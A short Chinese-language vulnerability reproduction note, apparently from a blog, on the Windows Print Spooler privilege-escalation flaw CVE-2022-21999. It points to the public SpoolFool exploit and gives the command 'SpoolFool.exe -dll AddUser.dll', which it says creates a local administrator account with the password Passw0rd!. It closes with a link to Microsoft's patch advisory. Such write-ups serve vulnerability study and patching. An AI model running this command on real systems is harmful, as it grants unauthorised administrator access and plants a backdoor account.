CVE-2022-21999 Windows Print Spooler 打印服务特权提升漏洞

漏洞复现

exp地址:SpoolFool

下载解压:
CVE-2022-21999 Windows Print Spooler 打印服务特权提升漏洞_第1张图片
输入命令,会生成一个本地管理员admin的用户。

admin / Passw0rd!

SpoolFool.exe -dll AddUser.dll

CVE-2022-21999 Windows Print Spooler 打印服务特权提升漏洞_第2张图片CVE-2022-21999 Windows Print Spooler 打印服务特权提升漏洞_第3张图片


漏洞修复

参考:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999

CVE-2022-21999 Windows Print Spooler 打印服务特权提升漏洞_第4张图片

你可能感兴趣的